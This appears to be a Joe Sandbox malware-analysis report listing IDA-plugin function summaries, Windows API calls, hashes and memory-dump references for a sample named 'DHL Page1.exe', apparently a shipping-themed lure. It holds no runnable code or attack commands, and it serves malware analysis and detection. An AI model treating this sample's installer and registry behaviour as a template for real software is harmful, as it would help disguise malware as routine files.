Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: b5eac4c8670a379a1fdb0849bd47085a0ce86dd70ec211609265b45d4efc13a4
Instruction ID: f714b94520bea21c366fb1e21a7d32544acf27ff5ed30f93b3bc1a8433c1b7bf
Opcode Fuzzy Hash: b5eac4c8670a379a1fdb0849bd47085a0ce86dd70ec211609265b45d4efc13a4
Instruction Fuzzy Hash: F4E092B4A00209BFEB00AB64ED49F7B7BACEB04748F008965B954E2190D774A9248A68

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D

Part of subcall function 00405393: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053CB
Part of subcall function 00405393: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053DB
Part of subcall function 00405393: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 004053EE
Part of subcall function 00405393: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll), ref: 00405400
Part of subcall function 00405393: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405426
Part of subcall function 00405393: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405440
Part of subcall function 00405393: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040544E

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: be7a47489ea50018fbd76c873434aa4b4615dfcfa67a4a1c51b4c4650fb71424
Instruction ID: 5c83051e151f5a57f9d6a67b97a1337a6843f277470dde6dc09651adf155129a
Opcode Fuzzy Hash: be7a47489ea50018fbd76c873434aa4b4615dfcfa67a4a1c51b4c4650fb71424
Instruction Fuzzy Hash: 00219C71900215FACF20AFA5CE4999E7971FF04358F20453BF511B51E0CBBD8982DA6D

Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(04836E88), ref: 00401BE1
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3

Strings

Call, xrefs: 00401B98, 00401B9E, 00401BB8

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 570c0905b13829ae1836afe61d189b829c8b41a936c28089b6656c7f7f362310
Instruction ID: 94690b970293462310cd42ff97a6ac8f03d0230ec7ec3c7cefeb9ae3e3c1ef53
Opcode Fuzzy Hash: 570c0905b13829ae1836afe61d189b829c8b41a936c28089b6656c7f7f362310
Instruction Fuzzy Hash: 42218172600110DBDB20EB94CF8495A73E8EB44318725457BE202B72D0DBB8AC919BAD

Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406577: FindFirstFileW.KERNELBASE(?,004302D8,0042FA90,00405D39,0042FA90,0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0), ref: 00406582
Part of subcall function 00406577: FindClose.KERNEL32(00000000), ref: 0040658E

lstrlenW.KERNEL32 ref: 00402299
lstrlenW.KERNEL32(00000000), ref: 004022A4
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: d5c5f44156de87c1167265a4648fb5279e580d22fe9ae9a4ebfd0d6556505392
Instruction ID: ee8ac65e668f3af58b9baaf7b23fc0e5dde34fb994b390349e9eab9aa0c768da
Opcode Fuzzy Hash: d5c5f44156de87c1167265a4648fb5279e580d22fe9ae9a4ebfd0d6556505392
Instruction Fuzzy Hash: 84117CB1904318AADB10EFE9DA499DEB7B8EF04358F10847FA905F72D1D6B8C5818B19

Function 00402511 Relevance: 4.5, APIs: 3, Instructions: 46registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402544
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402557
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 8d490a0f7bb4621e12093ce688087f24f41224cda3ee635b2e314be58bb4efad
Instruction ID: 104f7cdb5580bb57a0ef39117b7f9c08f86abfc11cf66101166623a2e680798b
Opcode Fuzzy Hash: 8d490a0f7bb4621e12093ce688087f24f41224cda3ee635b2e314be58bb4efad
Instruction Fuzzy Hash: B3018F71904204BFE7109FA59E8CABF766CEF80398F10443EF506A61D0EAF84E419A29

Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 10002963
GetLastError.KERNEL32 ref: 10002A6A

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55

Function 0040249D Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024CE
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 7c6eceb2e5823b15974c34d1093b08cbb70a1c9a4d1b4bc43721d62fcd546c51
Instruction ID: db3331748b387e0a23139b220d100322ea5e0004044d0e967d2a27da601b62a2
Opcode Fuzzy Hash: 7c6eceb2e5823b15974c34d1093b08cbb70a1c9a4d1b4bc43721d62fcd546c51
Instruction Fuzzy Hash: 31115171904205EADF14DFA0CA9C5AE77B4EF04385F21843FE142A72C0E7B89A85DB5D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0188f32dca6e9b44003ceb63c839ea2dc67d46965eeb2905a0b3237adda5d8a4
Instruction ID: e07966a3b022dad6e9c8dcac79104d657900a9ac230a00e78faec187382892ea
Opcode Fuzzy Hash: 0188f32dca6e9b44003ceb63c839ea2dc67d46965eeb2905a0b3237adda5d8a4
Instruction Fuzzy Hash: 5901F431A242109BE7095B389D05B6A37A8E710315F10863FF955F66F1D778CC428B4C

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
RegCloseKey.ADVAPI32(00000000), ref: 004023B6

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: dc04e2126df65ef1eab63fccb30ac189353dd4712f4d08d514386ad642d401af
Instruction ID: 2fd4d765ade6b53b90cd88198a899a3d6d05535282313d8f7fbe4cb70b164395
Opcode Fuzzy Hash: dc04e2126df65ef1eab63fccb30ac189353dd4712f4d08d514386ad642d401af
Instruction Fuzzy Hash: 09F0C233A04111ABEB10BBB49B8EAAE72699F40358F11443FF602B71C0C9FC4D428669

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(000103E2,?), ref: 00401587
ShowWindow.USER32(000103DC), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 75ed275faa78da242368db297d494725143cc63fbeb4094f24fda5c6bd14ddad
Instruction ID: 2e0f50fdeb2f7dd90edf2f5a34716b03b89a0c73686732c384bd2138bd300ff1
Opcode Fuzzy Hash: 75ed275faa78da242368db297d494725143cc63fbeb4094f24fda5c6bd14ddad
Instruction Fuzzy Hash: 56E04F36B001049BCB14CFA8ED908AE77A6EB48325315083AD502B3690C6B5AD80CF68

Function 0040660E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004034D5,00000009), ref: 00406620
GetProcAddress.KERNEL32(00000000,?), ref: 0040663B

Part of subcall function 0040659E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065B5
Part of subcall function 0040659E: wsprintfW.USER32 ref: 004065F0
Part of subcall function 0040659E: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406604

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction ID: a1ed9263875628f5ed2014ebe32992016f75a5afd04a23dafca1611998df3493
Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction Fuzzy Hash: F1E0863260422067D2509B759E0893762AC9ED9714302083EF946F2140DB789C329A6D

Function 00405E09 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405E0D
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E2F

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Function 004058DF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040345F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 004058E5
GetLastError.KERNEL32 ref: 004058F3

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
